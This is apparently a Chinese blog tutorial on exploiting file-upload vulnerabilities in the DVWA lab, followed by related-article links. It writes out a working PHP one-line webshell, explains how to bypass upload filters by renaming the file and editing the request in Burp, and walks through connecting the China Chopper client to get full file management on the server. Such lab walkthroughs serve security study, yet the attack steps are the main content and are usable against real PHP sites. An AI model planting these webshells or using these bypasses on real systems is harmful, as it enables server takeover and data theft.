上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
1、常见漏洞分类
2、常见验证手段
可抓包后修改扩展名为图片格式,再上传可绕过验证。如:
可以修改php文件后缀为其他,再上传。如test.php.xxx
可对图片文件添加一句话木马,再修改为.php上传,会解析为图片上传此文件。
客户端验证绕过的方法有:
例:
3、一句话木马
1)木马分为大马、小马和一句话木马:
小马:文件体积小、上传文件、文件修改、文件管理
大马:文件体积较大、功能齐全、能够提权、操作数据库等(不推荐)
一句话木马:短小精悍、功能强大、隐蔽性好、客户端直接管理(主流)
2)中国菜刀工具使用:
百度下载工具——运行caidao.exe
这里以php为例
首先我们先将php一句话木马上传到目标服务器中,用菜刀去尝试连接
新建一个php文档,输入一句话木马:<?php @eval($_POST['x']);?> 保存为10.php。
注意:x为菜刀连接时密码,可修改为其他字符。
再将10.php重命名为10.php.jpeg。(目标网站过滤上传jpeg和png文件)
打开burp软件,开启捕获。
再选择10.php.jpeg文件上传
将文件名修改为10.php,上传文件类型仍然是image/jpeg,可绕过上传过滤。
brup中关闭捕获。
dvwa中可见上传成功了!
../../表示当前路径的上一级、上一级。
复制上传成功后的路径,粘贴到当前浏览器地址的上一级、上一级得到完整路径。
即:http://ip/hackable/uploads/10.php
复制此路径,在菜刀中右键——添加——粘贴到地址栏——后面栏输入密码x——脚本类型选php——编码选gb2312——添加。
再右键此站点,选择要执行的命令——选文件管理,可操作此服务器上所有文件。
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)相关推荐
- DVWA-文件上传全等级绕过(一句话木马+中国菜刀+蚁剑)
DVWA文件上传 前言 一.low级别 1.1 一句话木马 1.2 中国菜刀使用 1.3 蚁剑 二.Medium级别 三.High级别 四.Impossible级别 前言 文件上传漏洞是对于上传文件的 ...
- 文件上传漏洞(一句话木马)-学习笔记
什么是webshell? 渗webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php后门 ...
- N等于三个质数求解题目--dp泄露研究--题目(m的高位攻击刷题)--大小循环统计出现次数题--Dvwa文件上传(2级)
目录 N等于三个质数求解题目 dp泄露研究 题目(m的高位攻击刷题) 大小循环统计出现次数题 Dvwa文件上传(2级) N等于三个质数求解题目 分析题目发现有三个质数,三个质数之间并有什么关系.n等于 ...
- Office文档上传后实时转换为PDF格式_图片文件上传后实时裁剪_实现在线预览Office文档
Office文档上传后实时转换为PDF格式_图片文件上传后实时裁剪 前置条件 安装LibreOffice 安装OpenOffice 安装Unoconv 安装ImageMagick.x86_64 安装G ...
- axios文件上传 formdata_基于业务场景下的图片/文件上传方案总结
图片/文件上传组是企业项目开发中必不可少的环节之一, 但凡涉及到用户模块的都会有图片/文件上传需求, 在很多第三方组件库(ant desigin, element ui)中它也是基础组件之一. 接下来 ...
- 上传阿里云oss对象型存储 本地文件和上传流上传
上传阿里云oss对象型存储 本地文件和上传流上传 import java.io.ByteArrayInputStream; import java.io.File; import java.io.Fi ...
- 网络安全:文件上传 + 一句话木马原理 + 菜刀的简单使用
很多的网站提供了文件上传功能,虽然提供了方便的服务,但稍有疏忽,就可能酿成大祸. 这里的疏忽是指,不对用户上传的内容进行检查. 仍旧以DVWA为例: 网站的本意是接受用户的图片(image),但后台代 ...
- 中国菜刀使用(图片上传漏洞)
图片上传漏洞: ps:此教程为靶场实战,切勿用于非法用途 1.准备制作图片马,随便找到一张图片重命名为1.jpg 2.准备好一句话木马,这里我命名为1.php 3. 需要用到dos命令将两个文件合到一 ...
- 基于DVWA文件上传,包含漏洞,上传一句话木马基础分析
木马 <?php @eval($_POST[value]); ?> 这是这个php程序,这个名字源于古希腊的传说这里就不说了,等于是一个别人家服务器在管理者不知情的情况下给你开了个后门你就 ...
最新文章
- Spring Boot 基于注解驱动源码分析--自动配置
- 微信与服务器通讯失败,linux服务器微擎提示couldn’t resolve host api.weixin.qq.com解决办法...
- Javascript在页面加载时的执行顺序(转载)
- http://www.zhihu.com/question/24896283
- 大数据分析存在哪些困难
- POJ 1325 Machine Schedule 解题报告
- 【BZOJ4480】快乐的jyy(统计两个字符串中相同的回文串-回文树合并)
- VHDL实验三:一位全加器、四选一多路选择器
- 10款优秀的在线格式转化器
- 第十五天PAT-A1124 Raffle for Weibo Followers简单模拟测试点三错误说明
- 如何计算摄影参数:分区基准面高程、相对航高、绝对航高、基线长度、航线间隔、航线数、每条航线的相片数、总相片数。
- java实现福利彩票抽奖_【福利】快来参与抽奖获得《Java程序设计》
- Qt相关资源下载百度云地址 永久有效
- IllegalStateException: Couldn‘t read row 0, col 10 from CursorWindow. Make sure the Cursor is initi
- 计算机系统的存储器系统的任务是,第2章 计算机系统的组成.ppt
- linux net子系统-系统调用层
- ZYNQ学习笔记_GPIO实例:通过EMIO实现按键控制LED
- 网络攻击与防御——对局域网的攻击
- 腾讯伪原创视频需要改什么好处
- LVGL的多语言转换工具--字体设置的好助手
热门文章
- MFC 单文档弹出对话框 标题图标
- 剪切音频matlab_科学网—matlab的音频处理:读取,裁剪,输出和命名 - 张智昊的博文...
- vue项目的三种开发模式
- SSM报错“java.lang.ClassNotFoundException: org.springframework.web.context.ContextLoaderListener”
- 20 张图揭开「内存管理」的迷雾,瞬间豁然开朗
- 前端开发需要学习什么?需要掌握哪些技能?
- android显示动画一直播放器,播放器适配经验总结——Android
- 47. 常用的数学工具类4-双曲函数的使用
- LeetCode1036. 逃离大迷宫(BFS)
- dos下xcopy命令